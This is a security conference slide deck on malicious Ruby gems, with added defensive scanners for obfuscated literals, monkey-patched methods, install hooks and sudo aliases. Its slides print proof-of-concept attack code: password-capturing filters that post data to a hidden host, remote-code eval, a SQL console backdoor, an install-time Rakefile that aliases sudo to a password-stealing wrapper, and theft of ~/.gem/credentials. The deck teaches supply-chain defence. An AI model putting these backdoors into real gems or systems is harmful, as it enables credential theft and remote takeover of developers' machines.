Slide 1

Hacking with Gems
Benjamin Smith
@benjamin_smith
Wednesday, October 10, 12

Slide 2

who i am

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

what i am NOT

Slide 8

Slide 9-10

please do not try this at home

Slide 11

what’s in my app?

GEM
  remote: https://rubygems.org/
  specs:
    actionmailer (3.2.8)
      actionpack (= 3.2.8)
      mail (~> 2.4.4)
    actionpack (3.2.8)
      activemodel (= 3.2.8)
      activesupport (= 3.2.8)
      builder (~> 3.0.0)
      erubis (~> 2.7.0)
    ...

Slide 12

what’s the worst that could happen?

Slide 13

gem 'awesome_rails_flash_messages'
github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 14

before...

Slide 15

after!

Slide 16

some “side effects”

if params.to_s.match(Base64.decode64('cGF...'))

Slide 17

...
File.open("#{Rails.root}/public/development.log", 'a+') do |f|
  f.write("#{params.inspect}\n")
end

Slide 18

?!?

Net::HTTP.post_form(
  URI.parse(Base64.decode64('aHR0cDo...')),
  { 'log' => params.merge(:url => request.url).inspect }
)

Slide 19

i like cGFzc3dvcmQ=\n

if params.to_s.match(Base64.decode64('cGF...'))

Slide 20

i like password

if params.to_s.match("password")

Slide 21

“development.log”

... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ...

Slide 22

elsewhere...
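
The trick on slides 16 to 20 is that the string the filter matches against and the URL it posts to are both hidden behind Base64.decode64 of a literal, so a grep for "password" or for the collection server finds nothing. The scanner below is an added example, not code from the talk or from the awesome-rails-flash-messages repository: it pulls every Base64 literal passed to Base64.decode64 (or unpacked with "m") out of a gem's source, decodes it in place and classifies what came out. The sample source is constructed to resemble the slides; 'cGFzc3dvcmQ=' is the literal slide 19 decodes, the other two literals and the evil.test host are assumptions for the example.

```ruby
require "base64"

# Constructed sample modelled on the before_filter shown on the slides.  The two
# long literals and the escalate call are assumptions; the gem's real literals
# are elided on the slides.
SAMPLE_SOURCE = <<~'RUBY'
  def awesome_flash_messages
    if params.to_s.match(Base64.decode64('cGFzc3dvcmQ='))
      File.open("#{Rails.root}/public/development.log", 'a+') { |f| f.write("#{params.inspect}\n") }
      Net::HTTP.post_form(
        URI.parse(Base64.decode64('aHR0cDovL2V2aWwudGVzdC9sb2dz')),
        { 'log' => params.merge(:url => request.url).inspect }
      )
    end
    escalate if params.to_s.match("YWRtaW4=".unpack1("m"))
  end
RUBY

# Base64.decode64 / strict_decode64 / urlsafe_decode64 applied to a quoted literal.
DECODE_CALL = /Base64\.(?:strict_|urlsafe_)?decode64\(\s*(['"])([A-Za-z0-9+\/=_\-]+)\1\s*\)/
# "...".unpack("m") / unpack1("m") / unpack("m0"): Base64 without mentioning Base64.
UNPACK_CALL = /(['"])([A-Za-z0-9+\/=_\-]+)\1\s*\.unpack1?\(\s*(['"])m0?\3\s*\)/

PRINTABLE = /\A[[:print:]\s]*\z/

# urlsafe_decode64 accepts both alphabets and tolerates missing padding.
def decode_literal(encoded)
  Base64.urlsafe_decode64(encoded)
rescue ArgumentError
  nil
end

def classify(decoded)
  return :undecodable if decoded.nil?
  text = decoded.dup.force_encoding("UTF-8")
  return :binary unless text.valid_encoding? && text.match?(PRINTABLE)
  return :url if text.match?(%r{\A[a-z][a-z0-9+.-]*://}i)
  return :sensitive_keyword if text.match?(/password|passwd|secret|token|credential|admin/i)
  :text
end

# One finding per encoded literal, in source order:
# { line:, encoded:, decoded:, kind: }
def find_encoded_literals(source)
  source.each_line.with_index(1).flat_map do |line, lineno|
    [DECODE_CALL, UNPACK_CALL].flat_map do |re|
      line.scan(re).map do |groups|
        encoded = groups[1]
        decoded = decode_literal(encoded)
        { line: lineno, encoded: encoded, decoded: decoded, kind: classify(decoded) }
      end
    end
  end
end

if $PROGRAM_NAME == __FILE__
  find_encoded_literals(SAMPLE_SOURCE).each do |f|
    puts "line #{f[:line]}: #{f[:encoded]} -> #{f[:decoded].inspect} (#{f[:kind]})"
  end
end
```

Run it over `gem unpack`ed sources rather than a git checkout, for the reason the be_truthy section gives later: the published gem and the repository need not contain the same files. A :url or :sensitive_keyword hit inside a gem that has no business talking to the network is the same signal the slides reveal by hand.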

Slide 23

Slide 24

that was easy. what else can I do?

Slide 25

gem 'net_http_detector'
github.com/benjaminleesmith/net_http_detector

Slide 26

show me the hack

Net::HTTP.post_form(
  #,
  {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ...

Slide 27-29

how it works

def HTTP.valid_post_form(url, params)
  ...

def HTTP.post_form(url, params)
  self.smart_log("Net::HTTP.post_form(#{url.inspect}, #{params.inspect})")
  Net::HTTP.valid_post_form(url, params)
end

Slide 30

...and one more thing...

eval(Net::HTTP.valid_get(URI("http://....herokuapp.com/snippets/6")))

Slide 31-34

database what?

append_before_filter :net_http_detector
...
if params[:db_console]
  @tables = ActiveRecord::Base.connection.tables
  if params[:query]
    @output = ActiveRecord::Base.connection.execute(params[:query])
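
The "how it works" slides show the mechanism: the gem keeps the real Net::HTTP.post_form under a new name (valid_post_form) and redefines post_form as a wrapper that logs the arguments before delegating, so every form post the application makes passes through the gem's hands. The block below is an added example, not the net_http_detector gem's code: it reproduces that alias-and-override pattern in a harmless stand-in (the "log" is an in-memory array, nothing is sent anywhere), then shows the check a practitioner can run at boot to catch it, by comparing where each Net::HTTP singleton method is defined against the directory net/http was actually loaded from. The NetHttpDetectorSim name and the CAPTURED array are assumptions made for the example.

```ruby
require "net/http"

# --- the technique, as a constructed stand-in for the gem (not its code) ---------
module NetHttpDetectorSim
  CAPTURED = []   # where the gem would have kept what it later POSTs home
end

class Net::HTTP
  class << self
    # keep the genuine implementation reachable under a new name ...
    alias_method :valid_post_form, :post_form

    # ... and put a recording wrapper in front of the public one
    def post_form(url, params)
      NetHttpDetectorSim::CAPTURED << "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})"
      valid_post_form(url, params)
    end
  end
end

# --- the check --------------------------------------------------------------------

# Directory net/http was really loaded from, read back from $LOADED_FEATURES, so the
# check is right whether net-http came from rubylibdir or from an installed gem copy.
def net_http_home
  feature = $LOADED_FEATURES.find { |f| f.end_with?("/net/http.rb") }
  raise "net/http is not loaded" unless feature
  File.dirname(File.expand_path(feature))
end

# Every singleton method of klass whose Ruby definition lives outside trusted_dir,
# as { name => "file:line" }.  C-implemented methods have no source_location and are
# skipped.  Blind spot worth knowing: alias_method keeps the original definition's
# source_location, so the added :valid_post_form name is not reported; only the
# overridden :post_form is.
def foreign_singleton_methods(klass, trusted_dir = net_http_home)
  klass.singleton_methods(false).sort.each_with_object({}) do |name, found|
    file, line = klass.method(name).source_location
    next if file.nil?
    next if File.expand_path(file).start_with?(trusted_dir + File::SEPARATOR)
    found[name] = "#{file}:#{line}"
  end
end

if $PROGRAM_NAME == __FILE__
  puts "net/http loaded from: #{net_http_home}"
  foreign_singleton_methods(Net::HTTP).each do |name, where|
    puts "  Net::HTTP.#{name} is defined at #{where}"
  end
end
```

The same comparison works for any class a gem has no reason to touch (ActiveRecord::Base.connection's adapter, OpenSSL::SSL::SSLContext, Kernel#system); run it after Bundler.require so that every gem has had its chance to patch. It does not see the second half of the slides, the db_console before_filter, because that adds new behaviour to the application's own controllers rather than replacing a library method.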

Slide 35

/users/sign_in

Slide 36

/users/sign_in?db_console=t

Slide 37

hello db access!

Slide 38

SELECT * FROM users;

Slide 39

UPDATE users SET admin=1 WHERE id=42;

Slide 40

CREATE USER admin1 WITH PASSWORD 'password';

Slide 41

careful of wolves in sheep’s clothing

Slide 42

Little Snitch
obdev.at/products/littlesnitch/index.html

Slide 43

Slide 44

that was easy. what else can I do?

Slide 45

gem 'better_date_to_s'
github.com/benjaminleesmith/better_date_to_s

Slide 46

what it claims to do

Date.new(2005, 1, 1).to_s(:short)
=> "1 Jan"

... instead of ...

=> " 1 Jan"

Slide 47

Slide 48

what it also does

set_date_formats_for(Rails.env, Rails.root.to_s)

Slide 49

better_date_to_s.bundle

(hex dump of the compiled Mach-O extension; the only legible strings are segment and section names: __TEXT, __text, __stubs, __stub_helper, __cstring, __unwind_info, __eh_frame, __DATA, __nl_symbol_ptr, __got, __la_symbol_ptr, __data, __LINKEDIT)

Slide 50

behind the curtain

if (strcmp(rails_env, "production") == 0) {
  sprintf(tar_command, "tar -zcvf %s/public/assets.tar.gz %s > /dev/null 2>&1", rails_root, rails_root);
  system(tar_command);
}

Slide 51

what what

Slide 52

i can haz source

Slide 53

truth time
• this gem doesn't actually work
• but it could... if I wasn't lazy
• "fat" gems are tricky to compile

Slide 54

that was easy hard. what else can I do? (that's easier)

Slide 55

gem install be_truthy
github.com/benjaminleesmith/be_truthy

Slide 56

what it does

> true.should be_true
> User.new.should be_true
> User.new.should be_truthy

Slide 57

what it ACTUALLY does

Slide 58

Slide 59

file tree looks ok

Slide 60

source code looks good

require "be_truthy/version"

module BeTruthy
end

Slide 61

but what was this?

Slide 62

I see no C

Slide 63

run the what file?

Gem::Specification.new do |gem|
  ...
  gem.extensions = ["Rakefile"]
  ...
end

Slide 64

there is no Rakefile

Slide 65

gem fetch vs gem install

> gem fetch be_truthy
> gem unpack be_truthy-0.0.1.gem

Slide 66-67

the real file tree

Slide 68

what does the Rakefile do?

Slide 69

sudo_file = __FILE__.gsub('Rakefile', 'lib/tmp.rb')
FileUtils.mv(sudo_file, "#{home_dir}/.tmp")

Slide 70

File.open(profile, 'a+') do |f|
  f.write("alias sudo='ruby #{home}/.tmp'\n")
end

Slide 71

FileUtils.rm(__FILE__)
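
Slides 63 to 71 make two points a practitioner should turn into a routine: the gemspec's extensions list names files RubyGems will execute during gem install (an extension does not have to be C), and the files in the published .gem need not match the GitHub repository, which is why the speaker uses gem fetch plus gem unpack instead of trusting the browsable source. The block below is an added example, not the be_truthy gem's or the talk's code. It diffs a gem fetch / gem unpack tree against a repository checkout and lists every install-time hook, marking hooks the repository never had. It reads the gem's metadata as YAML (what gem specification some.gem prints), never by loading the .gemspec, because a .gemspec is Ruby code and is as dangerous to eval as the Rakefile itself. The sample trees, their contents and the gem metadata are constructed to mirror the slides; the hook text is inert and never executed.

```ruby
require "rubygems"
require "tmpdir"
require "fileutils"
require "find"

# Relative paths of every regular file below dir, sorted; a .git directory is skipped.
def file_tree(dir)
  files = []
  Find.find(dir) do |path|
    Find.prune if File.basename(path) == ".git"
    files << path.delete_prefix(dir + File::SEPARATOR) if File.file?(path)
  end
  files.sort
end

# Parse gem metadata the way RubyGems itself does for `gem specification x.gem`
# (YAML through Gem::Specification.from_yaml).  Nothing in the gem is evaluated.
def load_metadata(yaml)
  Gem::Specification.from_yaml(yaml)
end

# Compare a `gem fetch` + `gem unpack`ed tree with a checkout of the repository the
# gem claims to come from, and list the install-time hooks (spec.extensions) that
# `gem install` would run, marking any the repository never had.
def audit_unpacked_gem(unpacked_dir, repo_dir, metadata_yaml)
  spec       = load_metadata(metadata_yaml)
  gem_files  = file_tree(unpacked_dir)
  repo_files = file_tree(repo_dir)
  hooks = spec.extensions.map do |ext|
    { file: ext, in_gem: gem_files.include?(ext), in_repo: repo_files.include?(ext) }
  end
  {
    only_in_gem:   gem_files - repo_files,
    only_in_repo:  repo_files - gem_files,
    install_hooks: hooks,
  }
end

def write_tree(root, files)
  files.each do |rel, content|
    path = File.join(root, rel)
    FileUtils.mkdir_p(File.dirname(path))
    File.write(path, content)
  end
end

# Constructed sample modelled on the slides: the GitHub checkout has no Rakefile and
# no lib/tmp.rb; the published gem ships both and declares the Rakefile as an
# extension.  The hook bodies are inert text here and are never executed.
REPO_FILES = {
  "lib/be_truthy.rb"         => "require \"be_truthy/version\"\n\nmodule BeTruthy\nend\n",
  "lib/be_truthy/version.rb" => "module BeTruthy\n  VERSION = \"0.0.1\"\nend\n",
  "be_truthy.gemspec"        => "# gemspec as it appears in the repository\n",
}.freeze
GEM_ONLY_FILES = {
  "Rakefile"   => 'FileUtils.mv(__FILE__.gsub("Rakefile", "lib/tmp.rb"), "#{Dir.home}/.tmp")' + "\n",
  "lib/tmp.rb" => "# the fake sudo wrapper would live here\n",
}.freeze

# What `gem specification be_truthy-0.0.1.gem` would print for the sample gem.
def sample_metadata_yaml(files)
  Gem::Specification.new do |s|
    s.name       = "be_truthy"
    s.version    = "0.0.1"
    s.summary    = "constructed sample"
    s.authors    = ["sample"]
    s.files      = files
    s.extensions = ["Rakefile"]
  end.to_yaml
end

def run_sample
  Dir.mktmpdir do |tmp|
    repo     = File.join(tmp, "repo")
    unpacked = File.join(tmp, "be_truthy-0.0.1")
    shipped  = REPO_FILES.merge(GEM_ONLY_FILES)
    write_tree(repo, REPO_FILES)
    write_tree(unpacked, shipped)
    audit_unpacked_gem(unpacked, repo, sample_metadata_yaml(shipped.keys))
  end
end

if $PROGRAM_NAME == __FILE__
  report = run_sample
  puts "only in gem:  #{report[:only_in_gem].inspect}"
  puts "only in repo: #{report[:only_in_repo].inspect}"
  report[:install_hooks].each do |h|
    flag = h[:in_repo] ? "" : "   <-- runs at install time, absent from the repository"
    puts "extension:    #{h[:file]}#{flag}"
  end
end
```

For a real gem the three inputs are the directory gem unpack produced, a git clone of the homepage the gem advertises, and the output of gem specification on the fetched .gem file. An extension entry is worth reading whatever it points at; the slides' Rakefile is the reminder that a pure-Ruby gem with no C at all can still run code on install.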

Slide 72

fseventer
fernlightning.com/doku.php?id=software:fseventer:start

Slide 73

what does "sudo" do now?

Slide 74-77

print "WARNING: Improper use of the sudo command ..."
system "stty -echo"
password = $stdin.gets.chomp
system "stty echo"
print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`

Slide 78

echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on

Slide 79

/usr/bin/sudo dscl . -create /Users/#{username}
...
/usr/bin/sudo dscl . -passwd /Users/#{username} password

Slide 80

Net::HTTP.post_form(URI.parse('http://.../logs'), {'log' => 'ssh enabled'})

Slide 81

ssh sysadmin@your-ip
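
The fake sudo on slides 74 to 81 only works because slide 70 appended one line to a shell profile; the binary in /usr/bin was never touched, so a file-integrity check on sudo sees nothing. What changes is how the interactive shell resolves the word sudo. The scanner below is an added example, not from the talk: it flags the three ways a profile can redirect sudo (an alias, a shell function, or a PATH entry that puts a user-writable directory ahead of /usr/bin) and reports which sudo binary PATH resolves to. The sample profile and the /Users/ben path are constructed for the example.

```ruby
# Constructed sample of a ~/.bash_profile after the be_truthy Rakefile appended its
# alias line; the /Users/ben path and the other entries are assumptions.
SAMPLE_PROFILE = <<~'SH'
  export PATH="$HOME/bin:$PATH"
  alias ll='ls -la'
  # alias sudo='sudo -E'   (commented out, must not be reported)
  alias sudo='ruby /Users/ben/.tmp'
  sudo() { /usr/bin/sudo "$@"; }
SH

# Files an interactive login shell reads (bash and zsh on macOS and Linux).
PROFILE_FILES = %w[.bash_profile .bashrc .profile .zshrc .zprofile .zshenv].freeze

# Three ways a profile can make `sudo` run something other than /usr/bin/sudo.
# A line is reported under the first rule it matches.
OVERRIDE_RULES = {
  alias:           /\Aalias\s+sudo=/,
  function:        /\A(?:function\s+sudo\b|sudo\s*\(\s*\))/,
  path_precedence: /\A(?:export\s+)?PATH=["']?(?:\$HOME|~)[^:"']*:/,
}.freeze

# Scan one profile's text; returns [{ line:, kind:, text: }, ...] in file order.
# Comment lines are skipped so a commented-out alias does not raise a false alarm.
def sudo_overrides(profile_text)
  profile_text.each_line.with_index(1).map do |raw, n|
    line = raw.strip
    next if line.empty? || line.start_with?("#")
    kind, = OVERRIDE_RULES.find { |_, re| re.match?(line) }
    { line: n, kind: kind, text: line } if kind
  end.compact
end

# Scan the real profiles under home; only files that exist are read, none written.
def scan_home(home = Dir.home)
  PROFILE_FILES.map { |name| File.join(home, name) }
               .select { |path| File.file?(path) }
               .map { |path| [path, sudo_overrides(File.read(path))] }
               .reject { |_, hits| hits.empty? }
               .to_h
end

# The binary a non-interactive `sudo` resolves to, by PATH order (nil if none).
def resolved_sudo(path_env = ENV["PATH"])
  path_env.to_s.split(File::PATH_SEPARATOR)
          .map { |dir| File.join(dir, "sudo") }
          .find { |candidate| File.executable?(candidate) }
end

if $PROGRAM_NAME == __FILE__
  sudo_overrides(SAMPLE_PROFILE).each { |h| puts "sample line #{h[:line]} (#{h[:kind]}): #{h[:text]}" }
  puts "sudo on PATH: #{resolved_sudo.inspect}"
  scan_home.each do |path, hits|
    hits.each { |h| puts "#{path}:#{h[:line]} (#{h[:kind]}): #{h[:text]}" }
  end
end
```

A path_precedence hit is not proof of anything (many people keep ~/bin first), but it is the condition under which a dropped ~/bin/sudo wins; the alias and function hits are the exact artefact slide 70 leaves behind. In a live shell, type sudo and alias sudo give the same answer without reading any file.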

Slide 82

take away: don't install ben's gems

Slide 83

how could I get you to run my code?

Slide 84

what gems are trustworthy?

Slide 85

how can I add my code to already trusted gems?

Slide 86-89

back to the truthy_gem

gem_api_key = File.open(`echo ~/.gem/credentials`.strip).read
gem_list = `gem list`
Net::HTTP.post_form(...)
github.com/benjaminleesmith/be_truthy

Slide 90

now I own your gems

Slide 91

> git clone your-gem-repo
...add a little code...
> rake build
> gem push your-gem

Slide 92

do people trust your gems?

Slide 93

do people who install your gems have trustworthy gems?

Slide 94

there’s still one problem

Slide 95

bootstrapping

Slide 96

being popular sucks

Slide 97

conferences

Slide 98

gem install thread_safe

Slide 99

brew install hub

Slide 100

gem install eventmachine

Slide 101

gem install aloha-ruby-conf

Slide 102

Slide 103

usernames
• ntreadway
• ken
• mlaverty
• takatsugu.ishioka
• evan
• leo

Slide 104

3.8% adoption

Slide 105

so what now?

Slide 106

gem cert --build

Slide 107

gem install rails -P HighSecurity

Slide 108

github.com/rubygems/rubygems

Slide 109

private gem repos

Slide 110

do not try this at home

Slide 111

don't install gems you don't need to

Slide 112

pay attention to what your gems do

Slide 113

monitor your system

Slide 114

read the source

Slide 115

gem install coal-mine-canary

Slide 116

thank you!

Slide 117

@benjamin_smith
https://github.com/benjaminleesmith
http://pivotallabs.com/users/bsmith/blog